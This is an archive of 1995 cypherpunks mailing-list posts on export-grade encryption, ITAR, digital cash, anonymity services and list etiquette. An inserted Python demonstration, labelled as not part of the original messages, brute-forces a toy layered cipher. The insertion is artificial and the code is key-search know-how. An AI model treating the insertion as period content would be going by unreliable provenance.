   Also, for those who were wondering, the "Arlington, CA" address was
merely a keying error. The actual envelope said VA.

   I will keep the list up to date with any further developments.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 27 Oct 1995 06:14:02 +0800
To: jeffb@sware.com
Subject: Re: 80 bit security from 40 bit exportable products
In-Reply-To: <199510252222.PAA16375@comsec.com>
Message-ID: <9510261534.AA08170@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



>Even if you assume complete independence of key setup, if a successful
>decryption at each layer can be independently detected and verified
>(which seems likely in your example), there're only about 3 * (2 ^ 40)
>total operations in the worst case, NOT 2 ^ (3 * 40) operations needed
>to expose the plaintext.  This is an effective 41.5 bits, not 120.
>

Of course.  It comes down to whether each encryption step plans some known
plaintext to be used for brute force testing of any next layer.
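
[Added example, not part of the original messages.] A toy model of the point made in this exchange: when every layer's plaintext starts with a recognizable header, each layer's key can be checked on its own, so the work for three layers adds up instead of multiplying. The cipher (SHA-256 in counter mode), the 12-bit key size and the header value are assumptions chosen so the demonstration runs instantly.

```python
import hashlib
import math

MAGIC = b"HDR1"   # constructed known plaintext that every layer begins with
BITS = 12         # toy key size for the demo; the thread discusses 40


def keystream(key, n):
    """Toy stream cipher for this demo only: SHA-256 in counter mode."""
    out = b""
    counter = 0
    while len(out) < n:
        block = key.to_bytes(8, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return out[:n]


def crypt(key, data):
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def wrap(message, keys):
    """Encrypt in layers (innermost key first), prefixing MAGIC each time."""
    data = message
    for key in keys:
        data = crypt(key, MAGIC + data)
    return data


def peel(ciphertext, layers, bits=BITS):
    """Search each layer's key independently, using MAGIC as the check.
    Returns (plaintext, number_of_trial_decryptions)."""
    data, trials = ciphertext, 0
    for _ in range(layers):
        for key in range(2 ** bits):
            trials += 1
            if crypt(key, data[:len(MAGIC)]) == MAGIC:
                data = crypt(key, data)[len(MAGIC):]
                break
        else:
            raise ValueError("no key produced the expected header")
    return data, trials


def effective_bits(bits, layers, verifiable):
    """Worst-case work, as log2 of trial decryptions.
    verifiable=True: each layer can be confirmed alone (costs add).
    verifiable=False: only the final plaintext can be confirmed (costs multiply)."""
    if verifiable:
        return math.log2(layers * 2 ** bits)
    return float(bits * layers)


if __name__ == "__main__":
    worst = [2 ** BITS - 1] * 3           # last key tried at every layer
    text, trials = peel(wrap(b"constructed sample message", worst), 3)
    print(text, trials, "of", 2 ** (3 * BITS), "for a joint search")
    print("40-bit layers:", round(effective_bits(40, 3, True), 2), "vs",
          effective_bits(40, 3, False), "bits")
```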





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 27 Oct 1995 11:11:13 +0800
To: cypherpunks@toad.com
Subject: MD5 and ITAR questions
Message-ID: <Pine.SOL.3.91.951026115444.19935B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



I can't remember the exact details, so could someone give me a quick 
refresher- which of the following are considered ok under ITAR?

	MD5 as a checksum
	keyed MD5 for authentication
	keyed MD5 as a stream cypher

Thanks
Simon


 ---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 27 Oct 1995 06:31:59 +0800
To: cypherpunks@toad.com
Subject: Re: MD4-derived hash functions
In-Reply-To: <01HWW4G5KUE69LV2GV@delphi.com>
Message-ID: <9510261603.AA26221@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Does anyone know whether Rivest was motivated to design
>MD5 by the partial attacks on MD4, or whether those came later?
>(This is totally idle curiosity.)

It was after...

>All of the well-known software hash functions seem to be based on
>MD4 these days, but that doesn't mean much about the security of
>MD4--3DES with three independent keys looks pretty strong, as does
>3DES with two independent keys, but that doesn't mean that single
>DES is a strong enough cipher for modern applications.

3DES with only two independent keys is only slightly more secure than
DES, consider a variant of the meet in the middle attack exploiting 
the fact that the constraint network is reducible to two equations
in one unknown.

>Is there a generic construction for
>arbitrary-length hash functions from good block or stream ciphers?

Yes, see Bruce's book.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller <hroller@metronet.com>
Date: Fri, 27 Oct 1995 05:41:13 +0800
To: remailer-operators@c2.org
Subject: Re:NEVER MIND - Anonymous Account Help
In-Reply-To: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
Message-ID: <Pine.HPP.3.90.951026120745.9325A@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, hroller wrote:

> Then I wait. But never get anything from alpha.c2.org.  I have gotten 
> some anonymous messages from replay, but they are still encrypted so 
> I don't know what it is sending me. Any help you can supply would be
> greatly appreciated.
> 
> 
> hroller
> 

Thanks to sameer, David and Joel M. for pidaho, it was working all the 
time. Those messages I was getting were the confirmations. I just didn't
know it. After decrypting the messages everything is working fine now. 
The only thing I didn't see in the Help files was that when you get 
confirmation from Alpha, it will be encrypted. But that was pointed out 
in Pidaho, Ver 2.5 Beta 6. 

Again thanks to all that helped. 

hroller




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ali@eit.COM (Ali Bahreman)
Date: Fri, 27 Oct 1995 08:59:47 +0800
To: cypherpunks@toad.com
Subject: RE: Let's Not Merge Mailing Lists, OK?
Message-ID: <199510262011.NAA22257@penetralium.eit.com.>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

The problem is reducing the noise at cypherpunks list, so all communities can 
benefit from it, and not the "varying levels of competence" different 
communities may have.  What more noble cause is there than to educate others of 
your beliefs?  A well thought out question or cross-point is not noise but a
poorly-backed false claim certainly is.

In special instances, cross-postings enable the cypherpunk community and 
the other communities to interact together to produce real-life solutions that 
real people would care to use.  Thinking on the social issues such as anonymity
and privacy with no regards to what other communities think about or have to 
say is simply not optimum.

Now if there are technical issues, such as mail-loops or some such thing against
cross-postings, please inform.

Regards,

Ali

p.s.
Being subscribed to cypherpunks is not a prerequisite for following the list;
thanks to its hypermail archive and numerous filters.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Fri, 27 Oct 1995 11:07:40 +0800
To: cypherpunks@toad.com
Subject: Usenet: pseudonymity's killer app
Message-ID: <199510262021.NAA03361@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

     Risks Digest 17.42 contains a Boston Globe story by Simson
L. Garfinkel detailing the risks of the DejaNews (http://dejanew.com)
Usenet archiving service.  Not only does this service archive Usenet
postings, it provides a "sophisticated system for retrieving 'author
profiles' of the individuals who have posted messages."  Many people
are upset at what they view as an invasion of privacy.

     The article notes that:

 > But Usenet has actually been archived for a long time. Many schools,
 > for example, have backup tapes containing Usenet messages dating back
 > many years. Furthermore, says Madere, the National Security Agency and
 > possibly other law enforcement or intelligence organizations has been
 > cross-referencing and indexing Usenet for quite some time. "I know for
 > a fact that they do have a text retrieval database which contains
 > Usenet," says Madere.  Creating a searchable index of Usenet "was
 > already done for what people might consider to be sinister purposes,"
 > says Madere. "What we have done is made it searchable for useful
 > purposes."

     DejaNews will be archiving the alt, talk, and soc groups
beginning later this year.  That could result in many more people
becoming upset at the service.

     It would appear that ISPs could make money from offering
anonymous or pseudonymous accounts to their customers who would rather
not have their postings used by marketers, employers, or neighbors.
Providing protection from junk mailers is also more politically
defensible in this society than providing protection from the
government.

     This could be the catalyst for widely used and accepted
pseudonymity on the net.

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottg@b4a206.mdc.com (TECO Master)
Date: Fri, 27 Oct 1995 18:04:39 +0800
To: CYPHERPUNKS@toad.com
Subject: Testing... Is this thing turned on?
Message-ID: <95102613292182@b4a206.mdc.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for mulching bandwidth, but I haven't received anything for
about a week...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 27 Oct 1995 09:46:13 +0800
To: cypherpunks@toad.com
Subject: newsweek oct 30 Levy digital cash article
Message-ID: <199510262050.NAA00978@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



a slick article by Steven Levy appears in the oct 30 Newsweek
mag (cover Farrakhan).

I'll let the ILF post it, but here are a few of the 
elements:

- covers mark twain bank going live with Chaumian "e-money"

- also a sidebar on Mondex..

- 1st virtual mentioned

- Bruce Sterling's "heavy weather" e-money dystopia

- Netscape flaw as example of the stakes

- US government get into the act?

- privacy concerns (EPIC Rotenberg quoted)

- "tax may be voluntary" --Barlow

- FinCEN worried about drug money

I didn't find any obvious errors or overhyped paranoia, so I commend
Levy on the article. it can be seen as a definite cypherpunk cap-feather.
Levy is doing a really great job IMHO. an editorial in an earlier issue
of newsweek about Rimm and pornography in cyberspace was dead bang on..

p.s. I'm very curious about the "information security" reference that
someone gave earlier, has there been any more information here about
that one?

--

also, my question about whether one loses the downloaded Chaumian bucks
if one's hard drive crashes was answered in the affirmative by Levy.
hoo boy, I think this could become one of the worst new urban legends
about losing money due to failed hardware/software. there is going to
be a lot of paranoia about this item. I'll bet virtually all digital
buck schemes will have to explicitly answer this question to a 
paranoid public: what happens if my computer crashes?

part of my motivation for querying about losing cash due to a hardware
failure was based on an interest in showing how the really "soft"
system of credit card purchasing that we have now, while considered 
lame by a lot of cypherpunks, often protects the consumer. remember,
Jane Sixpack is frequently locking her keys in a car. ecash that
can be lost or stolen just like real cash may not be as attractive
as say a credit card system whereby one can sometimes call up the
company and say afterwards, "I didn't really mean that".

cypherpunks should consider that one of the key things we think is
the strength of ecash--namely privacy-- may be a key area the
opposition to untraceable cash transactions can tout as a weakness or
problem.

it seems to me that the very techniques that tend to enhance privacy also
tend to make the spending "more dangerous" in the sense that one
cannot backpedal or one can lose it, irretrievably, more easily.
for a public with the IQ of Joe and Jane Sixpack, this could be a 
serious concern. identification is key to helping people retrieve
lost or stolen checks, etc.

"have you ever locked your keys in your car? don't use digital ecash.
you might lose it and never get it back."

I suggest that Chaum definitely consider this a major aspect in his
marketing campaign. it could be a very serious soft spot in widespread
public acceptance of ecash. rumors could float, "ecash is dangerous
to the consumer". hopefully we can head this one off at the pass.

imho, the future will never see complete digital cash, or complete
identification. they are likely to mix a lot. however I think ecash
may become very respectable, and ultimately become far more common
than identified transactions are today.

but it's really amazing how no serious alarm flags have been going off
in the legislative arena about digital cash. I suspect this is going
to become a white-hot public policy issue. if you thought the fights
over terrorism, wiretapping, or pornography laws were messy, just
wait until legislators pinpoint digital cash as the horseman of
the infocalypse. fireworks will fly. may you survive interesting times. <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 27 Oct 1995 09:59:30 +0800
To: cypherpunks@toad.com
Subject: Digitial Money [SHAMELESS PLUG FOR BOOK]
Message-ID: <v02120d06acb5ab456a01@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Leslie Lundquist, a co-worker of mine here at Electric Communities,
together with Dan Lynch from Cybercash & Interop fame, has written
a book called  _Digital Money: The New Era of Internet Commerce_.

It should appear in stores "real soon now"; it can be ordered right now
from any book store for $24.95. The book is intended as an overview
of current and projected digital payment systems and commerce, and
contains basic background information on the underlying technology.
It is intended for the general reader: this is the kind of book a
techno-weenie might buy for his or her manager to help them understand
some of these issues.

Note that this is a different book than _Digital Cash_, by Peter Wayner.
I'm not in the loop on this, but this appears to be "one of those
things" and not intentional on anyone's part.

For more information, e-mail leslie@communities.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 27 Oct 1995 11:36:14 +0800
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510260221.MAA29674@molly.cs.monash.edu.au>
Message-ID: <199510261908.PAA22358@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum writes:
>How about the numerical cmavo? You'd want to encode numbers. And you
>don't want people to know they are numbers, because they could
>count the digits (to get order of magnitude). Same for spelling cmavo.

I agree.  There are some cmavo with enough meaning to warrant some encoding.

Ok, for numbers we take our original 40 bit (or whatever) key and, by
convention, run it through a md5 to produce the key used for the next
digit.  By writing all numbers with 20 digits (padding zeros on the
front or back as desired) magnitude (and/or precision) is hidden.

>How about the tense system? You'd want to encode that because it could
>give important hints to locations (and times). Then again you could
>probably avoid using the "a little to the north and a long way east" tense
>altogether...

I'm not sure it gives anything away.  The cryptanalyst would only know
that there's a location, not anything important about the location, since
it could be padded with "null" direction and temporal operators.

And the tense selma'o could probably be treated as a single group for
encoding.  They're only semantically different, not syntactically.  You'd
end up with more confusing cyphertext, but that's no real problem unless
you're trying to hide the fact that you're encoding --- for which you
could stego the cyphertext in a rant generator.

>How about the attitudinals?

There are enough that encoding them as a group hides their meaning.

>> The selma'o that only have one member are especially meaning-free, as
>> they're typically elidable terminators and such.
>
>Like I said, I only glanced at it, but how about NAI and GAI?
>
>...
>> >Yes, but the grammatical structure itself may reveal heaps.
>> >(Except for trivial statements.)
>> 
>> In a natural language this might be true, but in Lojban the grammar's
>> regularity eliminates much of this information.
>...
>
>I'm not sure I'd agree here. I suspect you are overestimating the regularity
>of lojban grammar (then again maybe I'm underestimating...).

I think you're underestimating because you're discarding the effect of
having a cypher which can arbitrarily substitute gismu and rafsi.  With
my original examples of "Attack at dawn" vs "Party 'til you puke", there's
nothing to relate the items.  A long sequence of similarly simple statements
wouldn't add anything.  Increasing the complexity of the statements makes
it more difficult to find a false key, but the regularity of Lojban should
give you enough leeway to do it.

You'd probably want to avoid really complicated bridi, but these sorts of
things tend to appear more in literary works than in ordinary communication.

>> There are also problems due to ambiguity.
>
>Yup. If it's really a problem - ambiguity in language has been with us
>for a long time and nobody minds much. But I guess you wouldn't want
>arbitrary ambiguity in your text (you could have an interactive coder
>which immediately alerts you to all alternative meanings). Or you could
>put marks into your text to separate the word parts (like some beginner
>Esperanto books do) thus eliminating the problem.

I had in mind the sort of ambiguity that comes from "Time flies like an
arrow", in which any of the first three words could be the verb.  A
computer translator would have to know which to conjugate and which to
decline.

>> The even bigger inconvenience with natural languages comes in defining
>> the codebook.
>...
>
>I'm sure you could easily find wordlists giving the "first X" words of
>Esperanto - you could just standardize on one of them.

Yep, but it would have to be part of the cryptosystem's definition, as
opposed to the language's.

>Mi esperas ke tio cxi sencas...

.o'anai mi na cusku fi la .esperantos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Fri, 27 Oct 1995 11:15:06 +0800
To: cypherpunks@toad.com
Subject: [Dr. Fred] [FRED] (was: Re: Fred, Fred, Fred: Enough already!)
Message-ID: <199510261803.OAA18748@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:51 10.26.1995 +0800, James A. Donald wrote:
>At 11:58 AM 10/24/95 -0400, Robert Hettinga wrote:
>> Can we please talk to Dr. Fred, the Poster Child of the Informal Fallacy,
>> if we *really* have to, off line?
>
>Yes, please, will everyone please killfile Dr Fred.  I am tired of seeing
>things that are glaringly obvious explained in painful detail to someone
>who is reluctant to understand them.

At the very least, please put "Dr. Fred" or "[FRED]" in the subject line so
my filter hits it ("Fred" alone is too general).  Thanks. :-)

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Oct 1995 13:58:38 +0800
To: pjm@ionia.engr.sgi.com (Patrick May)
Subject: Re: Usenet: pseudonymity's killer app
In-Reply-To: <199510262021.NAA03361@ionia.engr.sgi.com>
Message-ID: <199510262218.PAA25204@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      It would appear that ISPs could make money from offering
> anonymous or pseudonymous accounts to their customers who would rather
> not have their postings used by marketers, employers, or neighbors.
> Providing protection from junk mailers is also more politically
> defensible in this society than providing protection from the
> government.

	Community ConneXion offers fully anonymous accounts.  If an
account holder chooses to reveal their personal details we will not
reveal them without a court order.  We've been doing it for over a
year now.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 27 Oct 1995 11:33:21 +0800
To: cypherpunks@toad.com
Subject: A real payoff of the export-SSL bruting.
Message-ID: <9510261935.AA23785@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


     I know of two companies which are developing products incorporating
cryptography. At both, the original plan was to distribute only a weak
exportable version. Marketing & distribution didn't want to deal with the hassle
of stocking different versions, and worried that the export version would
be seen as inadequate.

    Since the bruting of export SSL by the cypherpunk's key-cracking
ring, this policy has changed. It is now clear that the exportable 
version can be cracked, and probably will be cracked, with all the bad 
PR that entails. Both companies now plan to release export and
domestic versions.  (Some overseas sales are better than none, and 
not everyone needs or uses the cryptographic capabilities).

     Speaking only for myself,

	Peter Trei
	ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 26 Oct 1995 16:34:02 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: Mandatory ID in California?
In-Reply-To: <Pine.SV4.3.91.951025152409.3136C-100000@larry.infi.net>
Message-ID: <199510260643.AA26567@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>"States may not authorize arrest...for failing to produce identification..."
>       Kolender v. Lawson 461 U.S. 352 (1983)
>
>"...may not compel an answer and they must allow the person to leave 
>after a reasonable brief period of time...."  - - ibid

How about INS coming into the equation?  Do they have additional powers which
let them put your butt in a bad imitation of a Faraday cage?

Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwm132@psu.edu (CATCH 22)
Date: Fri, 27 Oct 1995 15:02:53 +0800
To: cypherpunks@toad.com
Subject: type trapz...
Message-ID: <199510262143.RAA40206@r04n12.cac.psu.edu>
MIME-Version: 1.0
Content-Type: text/plain


looking for a good /type trap/ program...  any directions?



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CATCH 22 PHANZINE      $1 ppd please
4915 Woodbury Dr.
Erie PA  16510-6413
rwm132@email.psu.edu                ~~ issue four~~
________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 15:45:47 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb5766d09021004a512@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 PM 10/26/95, Jeff Weinstein wrote:

>  The ITARs are currently keeping us(Netscape) from distributing
>our US-only products to people within the United States.  We have
>asked for clarification from the government about network distribution,
>such as how much verification of location and citizenship of the
>recipient we must do, and have yet to receive a response.  That
>makes it more than just an export issue, at least for us.

And I agree that this is a much more important issue than whether a t-shirt
can get an OK for export or not.

If the CJR for the t-shirt is ultimately granted, what useful information
will be derived, or what implications for Netscape's question will be
discovered?

If the CJR for the t-shirt is ultimately denied, ditto?

Distribution over networks--which is happening every day, and which is
happening every time the Cypherpunks list contains code fragments and other
useful comments on crypto tools--is a much more serious issue.

The t-shirt joke is unlikely to help. (For all those who commented that
wearing the munitions shirt is rilly, rilly kool, I say "Great!" Wear it in
the mosh pits, just lie to people about how the t-shirt "has been
classified as a munition." It hasn't been as of this writing.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 11:34:42 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Perrynoia in the Comics
Message-ID: <acb5785f0a02100419f3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM 10/26/95, Alan Olsen wrote:
>At 08:13 AM 10/26/95 -0400, you wrote:
>>
>>Alan Olsen writes:
>>> This has no real crypto relevance, but some anarchistic relevance.
>>
>>Alan;
>>
>>As much as I found the comment interesting, it probably belonged
>>somewhere like libernet-d, not here on cypherpunks.
>
>I posted it on Cypherpunks because it is the only list I take where such
>political views are even mentioned.  I thought that people on the list would
>enjoy it.  I prefaced it with [noise] so that people who would object would
>skip over it.  Evidently that disclaimer is not enough anymore.


I found Alan's comment about the comics interesting, as even Alan's critic
apparently did, and hardly harmful to the overall noise level. It gave in a
short snapshot a vignette of "pop culture" views of surveillance.

At less than 1% of the size of the latest EPIC crosspost to our list (or
was it EFF, or VTW?) it hardly will affect the list in any significant way.

Many of us have posted movie reviews, book reviews, even mentions of Alison
Armitage sightings. The list is more than just about Java and Netscape,
though newcomers may not know this.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 13:59:05 +0800
To: cypherpunks@toad.com
Subject: RE: Let's Not Merge Mailing Lists, OK?
Message-ID: <acb579ae0b02100468ae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:11 PM 10/26/95, Ali Bahreman wrote:

>Being subscribed to cypherpunks is not a prerequisite for following the list;
>thanks to its hypermail archive and numerous filters.

No, of course it isn't.

But copying the www-buyinfo@allegra.att.com mailing list on a post, as
you and some others did, is much more than following the list with
hypermail and other such tools: it is actively posting to two mailing
lists.

Sometimes this is OK, but often it results in two lists only marginally
educated in the issues of the other list.

I replied at more length to Ali in private, but will say here that anyone
is welcome to join the Cypherpunks list and to read up on the FAQs and
archives of past discussions.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Fri, 27 Oct 1995 10:57:50 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <199510262050.NAA00978@netcom23.netcom.com>
Message-ID: <Pine.SOL.3.91.951026180246.16411E-100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


>also, my question about whether one loses the downloaded Chaumian bucks
>if one's hard drive crashes was answered in the affirmative by Levy.

But as I said, if the drive is backed up you don't lose it. It's my 
understanding this is the case with the current Digicash/Twain bucks.  
But not necessarily with all implementations.

This "lose your money" with digital cash really does seem to get to 
people. I always point out that when you take $ out of an ATM machine, 
you don't expect to get it back if you lose it.  For those forms of 
e-money that are irretrievable when lost, users are warned not to download
huge amounts.

Question: will people's worries about losing their e-money lead them to 
accept a higher degree of traceability as a tradeoff?

Steven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 27 Oct 1995 10:44:45 +0800
To: Cypherpunks <jsw@netscape.com>
Subject: Re: CJR returned to sender
In-Reply-To: <308FBACB.581A@netscape.com>
Message-ID: <m0t8aTG-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

:   The ITARs are currently keeping us(Netscape) from distributing
: our US-only products to people within the United States.  We have
: asked for clarification from the government about network distribution,
: such as how much verification of location and citizenship of the
: recipient we must do, and have yet to receive a response.  That
: makes it more than just an export issue, at least for us.
: 
: 	--Jeff
: 
: -- 
: Jeff Weinstein - Electronic Munitions Specialist
: Netscape Communication Corporation
: jsw@netscape.com - http://home.netscape.com/people/jsw
: Any opinions expressed above are mine.

Don't hold your breath.  I just had a chat with the NSA person at the
Office of Defense Trade Controls who is supposed to answer all
questions about the export of cryptography and she took the position
that whether posting materials on a server is an export ``is an
interesting question.''  I specifically asked her if her office had
come up with the rigamarole that some servers use to make sure you are
a citizen and then give you an address that expires faster than I can
type where one can get the cryptographic software.  She denied that
that rigamarole was invented or approved by her office; and said that
it was an interesting question, not only for cryptography, whether a
server on the internet was a ``point of export.''  She told me that as
a law professor I would be interested in that question.  (I think that
the implication was that someone really in business would be terribly
frustrated.)

Of course, this is just my impression of a conversation that was not
really directed to any specific issues.  She did tell me though that
since cryptographic software does the same thing as cryptographic
hardware, such software was treated as hardware.  I asked where the
regulations said that, and she never was able to give me a direct
citation to anything in the regs.

I am sorry to be the bearer of bad news.

Ciao,
Peter
--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 27 Oct 1995 15:48:21 +0800
To: cypherpunks@toad.com
Subject: Mail to News gateways
Message-ID: <199510270018.SAA00625@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am compiling a quick list (for my own use, mostly) of mail 2 news
gateways to link to from my homepage. (As opposed to, for example,
posting it to Usenet or something)

A while back there was Yet-Another-Rehash[tm] of this theme and I
saved the messages: Homer's lightlink.com and Alex de Joode's
mail2news@utopia.hacktic.nl.

mail2news@c2.org used to be alive, but either wasn't getting the
groups I was posting to or it was shut down. (Sameer: email me please
about this)
 
Anyway, if anyone knows of anything else please tell me.
Oh, and the URL is http://students.cs.byu.edu/~don/mail2news.html

Thanks.
 
Don

Oh, by the way, anyone have any cool PGP/crypto icons to Inline into
my web page? <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 27 Oct 1995 11:39:15 +0800
To: cypherpunks@toad.com
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <v02120d12acb5f44790cc@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[stuff about losing e-cash]

They already point out that you shouldn't hoard money on
your own machine.

I've been doing what I can to pitch in and help out, including
some suggested edits to their materials. Here's my suggested
rewording of that section:

=========
Ecash that you keep on the hard drive is like cash. It can be erased
accidentally in the event of a hard drive crash or other system problem.
While we do have safeguards against this, there is a possibility you
could lose money if your ecash files are lost.

Money in the Ecash Mint is also like cash. Although the Mint is well-
secured and maintained by computer professionals, it is a new,
somewhat experimental system. Also, it is connected to the Internet.
While we have taken many steps to ensure the Mint's security, we cannot
at this time make the same guarantees we'd make for a regular bank
account.

Because of these factors, we strongly urge you to keep your balances in
the Mint and on your hard drive fairly low. A good rule of thumb is
to have no more money on your personal computer than you'd be comfortable
carrying in your wallet in a typical American city. Don't leave more
money in the Mint than you'd be comfortable leaving stashed in a drawer
in your house.
================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 27 Oct 1995 11:40:07 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: idle CPU markets
Message-ID: <Pine.SUN.3.91.951026184046.23045A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


With many high speed personal computers on the Internet and the 
deployment of low transaction cost Internet payment schemes, it seems 
inevitable that markets for idle CPU cycles and memory will develop.  An 
interesting problem is to try to predict who this market will benefit, 
and what the market will be used for.

So far it seems that cryptanalytic problems (e.g. factoring and brute 
forcing of keys) have the highest marginal value/MIPS among problems 
amenable to loosely coupled distributed computation.  However, I think it 
would be wasteful if the demand in idle CPU and memory markets were to be 
dominated by cryptanalysts since (non-academic) cryptanalysis is basically
a zero-sum game.  When a key is broken, no wealth is created, rather it
is transferred from the owner of the key to the cryptanalyst.

What other problems would benefit from easy access to lots of distributed 
CPU cycles?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 27 Oct 1995 11:29:19 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
